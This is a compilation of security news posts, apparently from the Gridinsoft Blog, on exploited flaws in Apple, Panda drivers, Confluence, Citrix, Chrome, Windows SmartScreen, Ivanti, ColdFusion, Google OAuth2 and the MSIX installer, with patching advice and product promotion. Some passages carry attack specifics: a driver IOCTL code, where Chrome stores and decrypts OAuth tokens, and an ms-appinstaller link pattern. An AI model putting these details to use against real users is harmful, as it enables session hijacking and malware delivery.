Critical Apple Operating Systems Vulnerabilities Exploited

The U.S. CISA has added to the agency’s Known Exploited Vulnerabilities catalog a critical vulnerability in Apple’s iOS and macOS, discovered by Apple’s security team. The flaw has been designated CVE-2022-48618 and has a rather high severity rating of CVSS 7.8. Upon successful exploitation, attackers could potentially bypass security measures and gain unauthorized access to sensitive information. CISA is urging all users to take immediate action to secure their devices.

Apple has not revealed much information about CVE-2022-48618 and its active exploitation in the wild. However, the Cybersecurity and Infrastructure Security Agency has directed all U.S. federal agencies to fix this flaw by February 21, per the binding operational directive (BOD 22-01) issued in November 2021.

CVE-2022-48618 Vulnerability Impact

Discovered within the kernel component of Apple’s software, this vulnerability threatens the integrity of devices by enabling adversaries to manipulate memory functions and execute arbitrary code. Successful exploitation leads to compromising personal data and undermining critical infrastructure security that relies on these technologies.

This flaw is being actively exploited and affects a wide range of devices, including older and newer models such as iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later. Additionally, it impacts Macs running macOS Ventura, Apple TV 4K, Apple TV 4K (2nd generation and later), Apple TV HD, and Apple Watch Series 4 and later. Thus, the systems affected by CVE-2022-48618 are:

Apple’s Response

In response to the discovery, Apple has promptly issued patches to rectify the vulnerability, embedding enhanced security checks within the latest software updates. These updates, which include iOS 16.2 and macOS Ventura 13.1, aim to fortify devices against potential exploits. However, the delayed disclosure of the vulnerability raises questions about the timing and transparency of security communications. Though, that is more of an “industry standard” than just Apple’s omission.

Apple has fixed a similar flaw in the kernel (CVE-2022-32844, CVSS score: 6.3) in iOS 15.6 and iPadOS 15.6, which were shipped on July 20, 2022. The flaw allowed an app with arbitrary kernel read and write capability to bypass Pointer Authentication. However, Apple addressed the issue with improved state management due to a logic issue.

The post Critical Vulnerability Uncovered in Apple iOS and macOS Exploited appeared first on Gridinsoft Blog.

Panda Security Driver Vulnerabilities Uncovered

Researchers have unearthed three critical vulnerabilities in a security driver extensively utilized across various digital platforms. The driver in question is pskmad_64.sys, which belongs to Panda Security. Although the vulnerability was discovered in July 2023, the company provided a patch only in January 2024.

By more detailed analysis, the experts discovered that the initial incident happened during the penetration testing procedure. The red team elaborated and used those vulnerabilities during the attack. Now, they received the codes of CVE-2023-6330, CVE-2023-6331 and CVE-2023-6332 respectively.

Analysis of the Flaws

The first vulnerability is CVE-2023-6330, which has CVSS 6.4 and is registry-related. Because the driver did not correctly validate the contents of these registry values, an attacker could place malicious content into the correct values. This could have resulted in a memory overflow. The minimum damage from this vulnerability is a denial of service.

The second vulnerability, CVE-2023-6331, also has CVSS 6.4, but Panda rates it as high. The vulnerability is related to the lack of bounds checking while moving data via memmove to an unloadable memory pool. An attacker can send a maliciously crafted packet to the driver using an IRP request with IOCTL code 0xB3702C08. This action will cause an overflow of the unloadable memory pool, resulting in an out-of-memory write. The minimum damage is a denial of service.

The third vulnerability CVE-2023-6332 has CVSS 4.1 and consists of insufficient request validation in the kernel driver. That is, an attacker can send a specific read request directly from kernel memory, causing sensitive data to be leaked. Although at first glance all these vulnerabilities seem harmless, in combination with other vulnerabilities they can cause more serious damage.

Antivirus Drivers Exploitation – A New Trend?

The story around vulnerable Panda Security drivers is strangely similar to the recent news about a tactic employed by Kasseika ransomware. Within a course of BYOVD attack, the latter exploited a flawed driver of a VirIT Agent System security solution. Such an approach allowed hackers to list all the processes running in the environment and suspend the ones related to the security tools.

Overall, the idea of using vulnerable drivers in cyberattacks is not new. Though targeting specifically antivirus/antimalware software drivers appears to be a new trend. Such drivers have deeper system integration, leading to more comprehensive control over the system in case of a successful exploitation. Moreover, security tools themselves usually consider these drivers safe and legit, meaning that attackers can stay under the radar even having their “main weapon” deployed directly on the disk.

How to stay protected?

To ensure your safety and security, keeping your software and security systems up to date is crucial. Thus, conducting routine system audits and implementing robust security protocols can also help protect against potential exploits. In addition, there are more detailed recommendations that address current vulnerabilities.

The post Panda Security Driver Vulnerabilities Uncovered in APT Simulation appeared first on Gridinsoft Blog.

RCE Vulnerability in Confluence Exploited in the Wild

According to Shadowserver, a threat monitoring service, their systems detected thousands of attempts to exploit CVE-2023-22527, which was given a maximum CVSS score of 10. The vulnerability allows attackers to achieve a remote code execution (RCE) in a low-complexity attack without authentication. These attacks came from over 600 unique IP addresses, with over 39,000 exploitation attempts recorded.

We are seeing Atlassian Confluence CVE-2023-22527 pre-auth template injection RCE attempts since 2024-01-19. Over 600 IPs seen attacking so far (testing callback attempts and 'whoami' execution). Vulnerability affects out of date versions of Confluence:https://t.co/HFkPWIzJ1S pic.twitter.com/JPnsf3NFs2

— Shadowserver (@Shadowserver) January 22, 2024

22,674 attacker IP addresses are recorded being from Russia. Among other popular locations for the attackers are Singapore, Hong Kong, the U.S., China, India, Brazil, Taiwan, Japan, and Ecuador. The security flaw affects outdated Confluence 8 versions released before Dec. 5th, 2023, and Confluence 8.4.5, which no longer receives backported fixes. Confluence 7.19.x Long-Term Support (LTS) versions and Atlassian Cloud instances aren’t impacted.

Details of the Vulnerability

The CVE-2023-22527 vulnerability involves insecure user input included in a specifically crafted template. Using it, hackers gain the ability to execute arbitrary code remotely on the server hosting Confluence without any authentication. Attackers can manipulate templates to include malicious code, which is executed when the server processes.

In addition, successfully exploiting this vulnerability could allow an adversary to cause data destruction on the affected instance. Confidentiality has no impact, as an attacker cannot exfiltrate any instance data. However, the effect of exploitation includes gaining control over the server, accessing sensitive information, disrupting operations, or launching further attacks.

Mitigation and Recommendations

The company addressed the vulnerability with the release of versions 8.5.4 (LTS), 8.6.0 (Data Center only), and 8.7.1 (Data Center only). Atlassian recommends that customers install the latest version. So, if you are on an out-of-date version, you must immediately patch it. Developers insist on patching each affected installation to the newest version available.

If your organization is running an outdated Confluence instance, it is necessary to consider it potentially compromised. It is highly recommended to immediately patch and review the systems thoroughly to detect any signs of exploitation. Security experts also suggest taking additional measures such as threat hunting, log review, monitoring, and auditing for the affected systems.

In addition, we recommend using EDR and XDR solutions. Both systems offer real-time monitoring, threat intelligence integration, automated response, and behavioral analysis, providing essential security against vulnerabilities.

The post Confluence RCE Vulnerability Under Massive Exploitation appeared first on Gridinsoft Blog.

2 Citrix RCEs Exploited In The Wild, CISA Urges to Update

Wednesday, January 17, the Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding actively exploiting three vulnerabilities. The involved vulnerabilities are CVE-2023-6548 and CVE-2023-6549. The agency immediately added these vulnerabilities to its Known Exploited Vulnerabilities Catalog and demanded that U.S. federal agencies patch it ASAP.

The first has a CVSS score of 5.5 and affects NetScaler ADC and Gateway management interfaces. Its deadline to fix it is January 24. As for the other two vulnerabilities, one of them can cause a denial of service condition on specific configurations. It concerns vulnerable Gateway appliances like VPN, ICA Proxy, CVPN, RDP Proxy services, or AAA virtual servers. This vulnerability has a CVSS score of 8.2, more than the previous one. However, CISA has given three weeks to fix these two vulnerabilities.

So, why would you prioritize fixing vulnerabilities with lower CVSS? When they are easy to exploit, this decision becomes more obvious and demanded. While exploiting some vulnerabilities with maximum CVSS requires certain conditions close to the laboratory, other issues require much less effort. It’s no wonder CISA so strongly recommends that this vulnerability be fixed first and foremost.

Citrix RCE Vulnerability Details

CVE-2023-6548 is a medium-severity (CVSS score of 5.5) Remote Code Execution (RCE) vulnerability that affects Citrix NetScaler ADC and Gateway appliances. It allows an authenticated attacker with low-level privileges to execute code on the management interface of the affected devices via NSIP, SNIP, or CLIP.

Next, the CVE-2023-6549 vulnerability is a Denial of Service (DoS) vulnerability. It was also found in the Citrix NetScaler ADC and has a CVSS score 8.2. Threat actors can exploit it under specific configurations of vulnerable appliances. As mentioned, VPN, ICA Proxy, CVPN, RDP Proxy services, or an AAA virtual server are at risk. The vulnerability can disrupt services by overwhelming the system, leading to a denial of service condition.

Citrix Responds to New Vulnerabilities

Citrix promptly published an advisory and recommended that customers immediately apply updates for affected versions. Customers using Citrix-managed cloud services or Adaptive Authentication are not required to take action. The company suggests separating network traffic to the appliance’s management interface and not exposing it to the internet, as outlined in their secure deployment guide.

In addition, the company strongly recommended that network traffic to the appliance’s management interface be separated, either physically or logically, from regular network traffic. Furthermore, the management interface should not be exposed to the internet, as outlined in their secure deployment guide.

The post 2 Citrix RCE Under Active Exploitation, CISA Notifies appeared first on Gridinsoft Blog.

New Chrome 0-day Vulnerability Fixed

On January 16, Google released an update for its Chrome browser that contains a fix for 3 vulnerabilities. Among them there is one, CVE-2024-0519, that was reported by an anonymous user. The company acknowledges the exploitation of this breach in the wild.

Key issue of the vulnerability lies in an improper memory access control in the JScript V8 engine, used in Chrome. The issue falls under CWE-119 designation. The way Chrome operates supposes the ability of direct memory addressing, but with lack of proper handling, it leads to the ability to reference to a wrong memory location. What this gives to attackers is the ability to both read and write to the random memory area, causing data leaks and arbitrary code execution.

Besides the most sensible issue, there are also 2 high-severity vulnerabilities fixed in the same update. Both touch V8 JavaScript, too, but are related to lack of memory write validation and type confusion. The latter, actually, can lead to similar effects with CVE-2024-0519, so it should be treated with the same seriousness. The good thing about these two is the absence of their real-world exploitation.

Google Releases Fix to the Newest 0-day Exploit

The severity of the issue obviously calls for urgent response from the developer. Fortunately, Google never hesitates to patch such bugs. However, due to the limitations, the patch may not be available to all users simultaneously. Here is the list of OS-specific versions that contain a fix.

To check whether you have an updated version of the browser or to check for updates, go to Settings → About Chrome. This will open the menu which checks the update availability each time you open it.

Being the most popular web browser is not just about privileges, as you may witness. Such a humongous user base means increased (if not maxed out) attention from adversaries, who take such vulnerabilities nothing short of a gift. For ordinary users, the best way to counteract this is to keep an eye on the latest updates, specifically on what issues they fix.

The post New Google Chrome 0-day Vulnerability Exploited, Update Now appeared first on Gridinsoft Blog.

Phemedrone Stealer Campaign Exploits CVE-2023-36025

Trend Micro researchers uncovered a malware campaign exploiting the CVE-2023-36025 vulnerability in Microsoft Windows Defender SmartScreen. This campaign involves the Phemedrone Stealer, which can extract a wide range of sensitive data. Its infection chain begins with cloud-hosted malicious URL files, often disguised using URL shorteners. Upon execution, these files exploit CVE-2023-36025 to initiate the malware download.

The campaign itself is concentrated on social media. Hackers spread URL files, that look as an innocent link shortcut. Clicking it initiates a call to the GitHub repo, that returns the shellcode needed to download and run the payload. While it is not new to see the frauds targeting such places, the use of URL files is what defines the efficiency of the trick. They essentially act as a lockpick to user trust, spam filters and system protection all at once.

CVE-2023-36025: A Gateway for Cybercriminals

In a nutshell, CVE-2023-36025 is a critical vulnerability that affects Microsoft Windows Defender SmartScreen. It allows attackers to bypass security warnings and checks by manipulating Internet Shortcut (.url) files. Despite Microsoft’s patch released on November 14, 2023, cybercriminals have actively exploited the vulnerability, leading to its inclusion in the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) list.

In the Phemedrone campaign, frauds use advanced evasion tactics by utilizing a control panel item (.cpl) file to bypass Windows Defender SmartScreen. By default, it should send you a warning once you the URL shortcut. But the usage of specifically crafted file variant circumvents the protection and executes malicious downloads in the background. Further on the line, a couple of other known Windows weaknesses are exploited, particularly the Windows Control Panel binary.

Detailed Analysis

Attackers spread Phemedrone Stealer malware using cloud hosting and URL shorteners. They exploit CVE-2023-36025 by tricking users into opening .url files. They evade Windows Defender SmartScreen using a .cpl file and the MITRE ATT&CK technique T1218.002. The malware executes a DLL loader that calls Windows PowerShell to download a loader from GitHub. The second-stage loader, Donut, can execute various types of files in memory and targets multiple applications and services to steal sensitive information.

The malware collects system information and compresses it into a ZIP file using MemoryStream and ZipStorage classes. It then validates the Telegram API token and sends the attacker the compressed data via the SendMessage and SendZip methods. The SendZip method uses an HTTP POST request to compress the data into a document and send it to the Telegram API.

Mitigation and Recommendations

In light of this threat, when attackers find vulnerabilities faster than developers fix them, we have a few recommendations in that regard:

• Regularly update your OS, apps, and security solution. This action is crucial as developers continuously address security vulnerabilities through patches. Although the process may seem tedious, it is a necessary and proactive measure to ensure that your operating system, applications, and security solutions are equipped with the latest defenses against evolving cyber threats.
• Be cautious with Internet Shortcut (.url) files. Exercise caution, especially when dealing with Internet Shortcut files, particularly those received from unverified sources. These files can serve as gateways for malware, making it essential to pay attention to the legitimacy of URLs before opening them to mitigate the risk of infection.
• Implement advanced security solutions. This measure detects and neutralizes malware if it infiltrates your device. Robust security software with real-time monitoring and threat detection capabilities adds an extra layer of protection, helping identify and promptly respond to potential threats.



• Stay informed about the risks of phishing and social engineering. These tactics often serve as the initial vectors for malware campaigns. Educate yourself and your team on recognizing phishing attempts, avoiding suspicious links, and verifying the authenticity of communications to minimize the likelihood of falling victim to such cyber threats.

The post Windows SmartScreen Vulnerability Exploited to Spread Phemedrone Stealer appeared first on Gridinsoft Blog.

Ivanti Connect Secure Zero-Day Exploited

Ivanti, a prominent software company, recently issued a critical alert concerning its Connect Secure VPN appliances. These devices are susceptible to zero-day vulnerabilities currently being exploited in sophisticated cyberattacks. Experts attribute these attacks to suspected Chinese state-backed hackers.

Ivanti has confirmed that the vulnerabilities in question allow attackers to gain unauthorized access and execute arbitrary code on affected devices. Considering the widespread use of Ivanti Connect Secure appliances in various business environments and providing secure remote access to corporate networks, it is of heightened concern.

Details of the ICS 0-Day Vulnerability

The exploited vulnerabilities are CVE-2023-46805 (CVSS 8.2) and CVE-2024-21887 (CVSS 9.1). The vulnerabilities can be fashioned into an exploit chain to take over susceptible instances over the Internet. These flaws may lead to severe consequences, including remote code execution (RCE) and unauthorized access to sensitive data. That, actually, explains the reason for 8+ score – the best things come in two.

The first vulnerability concerns authentication bypass in the web component, which allows remote attackers to access restricted resources without proper control checks. The second vulnerability is related to command injection in the web components, which allows authenticated administrators to execute arbitrary commands on the appliance by sending specially crafted requests.

Patches Not Yet Available

Although it has identified fewer than ten customers that have been affected, Ivanti has advised all of its customers to run the external Integrity Checker Tool (ICT) as a precautionary measure. The company has also added new functionality to the external ICT, which will be incorporated into the internal ICT. Customers should ensure they have both tools’ latest versions.

As for patch fixes, Ivanti plans to release patches for these vulnerabilities during the week of January 22. However, they will be rolled out in a staggered schedule according to the product version. In the meantime, the company has released a series of mitigation steps that customers should follow immediately to safeguard their systems. It is highly recommended that organizations follow these mitigation steps, as the situation is still evolving.

How to Protect against 0-day vulnerabilities?

Since a zero-day vulnerability is a vulnerability that attackers learned about before software developers did, there is no guaranteed solution. However, some measures significantly reduce the risks, and I will list them below:

• Use corporate-grade protection solutions like EDR/XDR. This innovative anti-malware software approach focuses on endpoint protection rather than individual devices. EDR and XDR solutions collect a vast amount of data about endpoint activity, including file operations, network traffic, and user behavior. It employs machine learning and AI to detect and respond to threats. By analyzing this data, they can identify anomalous patterns indicating a zero-day attack.
• Apply Zero Trust. Zero trust is a cybersecurity model that grants access on a least privilege basis and continuously verifies users and devices. As a result, this reduces the attack surface and makes it more difficult to exploit vulnerabilities.
• Perform regular pentesting. Penetration testing is a simulated real attack on an organization’s IT infrastructure to identify and assess vulnerabilities that attackers could exploit. So, this action can help organizations identify zero-day vulnerabilities that other security tools may not detect.

The post Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild appeared first on Gridinsoft Blog.

ColdFusion ACE Vulnerabilities Exploited in Real-World Attacks

On January 8, CISA released their regular notice on new exploited vulnerabilities, specifying among others 2 security breaches in Adobe ColdFusion. Both of them are dated summer 2023, with the patches being available at around the same time. Nonetheless, the organization states about the exploitation, which is not doubtful considering the trends. And as both vulnerabilities score the CVSS rating of 9.8, the very fact of its usage in cyberattacks is concerning.

As I said in the introduction, both CVE-2023-29300 and CVE-2023-38203 are about the poor data validation upon deserialization that leads to the arbitrary code execution (ACE). Interestingly enough, both of them touch the same string versions of ColdFusion – 2018, 2021 and 2023. By sending a specifically crafted data package, targeted on the vulnerable ColdFusion server, adversaries can make the server execute the code they need. No user interaction is needed for this trick, which increases the severity of the vulnerability even more.

Arbitrary code execution vulnerabilities may serve as both initial access points and opportunities for lateral movement. The fact that this particular vulnerability works as is, without the need for user input, makes the exploitation just a piece of cake. And since ColdFusion is a rather popular app server solution, it is not hard to reach something important after compromising it, not to mention how easy it is to find a victim.

List of Affected ColdFusion Versions

Adobe ColdFusion Vulnerability Patches & Mitigation

Upon uncovering the vulnerabilities back in June 2023, Adobe released the updates^{1 2} which have these issues fixed. The company insisted on users to install these patches as soon as possible. And well, it cannot be a better moment to update than right now, after the official notification regarding the exploitation. Here is the list of ColdFusion versions that are no longer vulnerable to the said exploits:

At the same time, no workarounds or mitigations are available. This was expected though, as the nature of these vulnerabilities does not suppose the ability to fix it without the intrusion into the program code. In fact, there was over half a year of time to update, so applying any makeshift fixes now is irrational in any case.

Still, there is the ability to preventively protect the network from any kind of intrusion. By using Network Detection and Response (NDR) solutions, you make it much less likely that illicit traffic will reach your servers. By combining this with all-encompassing protective solutions, like Extended Detection and Response (XDR), you will receive a reliable shield against known threats, as well as ones that are only to be discovered.

The post Two Adobe ColdFusion Vulnerabilities Exploited in The Wild appeared first on Gridinsoft Blog.

OAuth2 Vulnerability Allows for Persistent Session Hijacking

The attackers found a way to use specific components within the Chrome browser to hijack sessions without a risk of it being interrupted by password changes. They targeted Chrome’s token_service table, part of the WebData, to exfiltrate tokens and account IDs. This table contains essential information, such as the GAIA ID and the encrypted_token column. Next, the attackers decrypted these encrypted tokens using a key stored in Chrome’s Local State within the UserData directory.

This method is similar to how Chrome stores passwords, indicating that the attackers deeply understood Chrome’s data management system. The exploit’s success relied on the attackers’ ability to navigate and utilize Chrome’s intricate data structures, specifically those related to user authentication and token management.

MultiLogin Endpoint Is The Culprit

The MultiLogin endpoint is a crucial element of Google’s OAuth2 system. It synchronizes Google accounts across various services, ensuring a consistent user experience by aligning the browser account states with Google’s authentication cookies. However, attackers have found a way to exploit this endpoint’s functionality. By providing vectors of account IDs and auth-login tokens, attackers can maintain unauthorized access to Google services.

Although this is a regular operation for the endpoint, attackers have used it maliciously. The endpoint’s invisibility and exploitability make it an ideal target for exploitation. It is not widely documented or known, and its role in managing simultaneous sessions or user profile switches makes it a potent tool for attackers once they understand how to manipulate it.

The Discovery and Spread of the OAuth2 Exploit

Back in October 2023, one of the malware developers described a vulnerability in OAuth2 and the exploit to it on its Telegram channel. This exploit uniquely allowed the generation of persistent Google cookies by manipulating tokens. This capability ensured continuous access to Google services, bypassing standard security measures even after resetting the user’s password​​. Obviously, the exploit’s potential didn’t go unnoticed.

Lumma infostealer was the first to integrate this exploit in November 2023, employing advanced blackboxing techniques to protect the methodology. This incorporation marked the beginning of a trend, as the exploit quickly caught the attention of various malware groups. Following Lumma, malware entities like Rhadamanthys, Stealc, Meduza, Risepro, and WhiteSnake implemented the exploit. Each group brought nuances to the exploit’s application, indicating its versatility among cybercriminals​​.

Hidden Tactics

In addition, the attackers manipulated the token:GAIA ID pair, which is also essential in Google’s authentication process. This manipulation allowed them to regenerate Google service cookies and maintain unauthorized access to user accounts. Thus, Lumma, a key player in exploiting this vulnerability, encrypted the critical token:GAIA ID pair with proprietary private keys. This process, known as “blackboxing,” not only obscured the core mechanics of the exploit but also made it difficult for other malicious entities to replicate the method.

Since the attackers encrypted the communication between their C2 and the MultiLogin endpoint, it was challenging for network security systems to detect the exploit. Standard security protocols often overlook such encrypted traffic, mistaking it for legitimate data exchange.

Interim Measures for Protection

While Google is working on fixing the vulnerability, there are some immediate steps you can take to protect your account. First, it is recommended that you log out of all your browser profiles. This will invalidate your current session tokens. After logging out, change your password and log in again. The action will generate new session tokens. Such a step is essential because tokens and GAIA IDs may have been stolen, and generating new session tokens will prevent unauthorized access by rendering the old tokens useless.

The post OAuth2 Session Hijack Vulnerability: Details Uncovered appeared first on Gridinsoft Blog.

MSIX Installer Protocol Exploited

The emergence of a malware kit market, exploiting the MSIX file format and ms-app installer protocol is nothing new. However, in this case, the kit, sold as a service, enables attackers to leverage the vulnerabilities within the protocol to distribute malware, including ransomware.

As a reminder, MSIX is a file packaging format designed specifically for Windows 10. It was based on the concept of XML manifest files. In these files, developers can describe how the deployment process works, what files are needed, and where they can be obtained. The root of the problem is that files packaged with MSIX can be delivered to the system over the Internet via ms-appinstaller. That, in turn, makes it possible to create links format ms-appinstaller:?source=//website.com/file.appx, invoking malware installation in such a way.

As for modus operandi, crooks have effectively utilized signed malicious MSIX application packages camouflaged as legitimate software to infiltrate systems. These packages are spread through various channels. In this case, it’s Microsoft Teams and deceptive advertisements on popular search engines. This strategy allows the attackers to bypass traditional security measures, such as Microsoft Defender SmartScreen and browser download warnings, making the attacks more difficult to detect and prevent.

Multiple hacking groups have been found to exploit the App Installer service since mid-November 2023. These groups use various techniques to distribute malicious software, including fake installers and landing pages. Some notable groups include Storm-0569, Storm-1113, Sangria Tempest, and Storm-1674.

Microsoft Blocks MSIX Installer

That is not the first time Microsoft faces the exploitation of this installation method. In February 2022, Microsoft disabled the vulnerable protocol, due to its exploitation by Emotet, TrickBot, and BazaLoader malware. Back in the days, the used vulnerability was a bit different, but lead to almost the same effect – the drive-by malware installation.

This time, Microsoft recommends installing the patched App Installer version 1.21.3421.0 or later to block possible abuse. The patch disables the ms-appinstaller handle by default, thus making it impossible to misuse it. Redmond also advises administrators who cannot immediately install the latest version of App Installer to disable the protocol via Group Policy. They can do that by setting EnableMSAppInstallerProtocol to Disabled.

Is This Vulnerability Dangerous?

It is rather dangerous, and it becomes clear once you see the list of threat actors that exploit this issue. Most of the time, it allows for backdoor and RAT installation, which act as open gates for more malicious programs. Even though in current attacks MSIX vulnerability is used mostly against corporations, nothing stops cybercriminals from applying it against home users.

To stay protected against such attacks, it is vital to install the latest patches and keep an eye on cybersecurity news. As you can see, any critical vulnerability almost always hits the newsletter headlines.

As a layer of reactive protection, I can recommend having an advanced security solution. While being hard to detect in a signature analysis due to the spoofed certificate, malware is rather easy to uncover on the run with a heuristic detection system. GridinSoft Anti-Malware is a solution that can provide you this kind of protection.

The post Microsoft Disables MSIX App Installer Protocol appeared first on Gridinsoft Blog.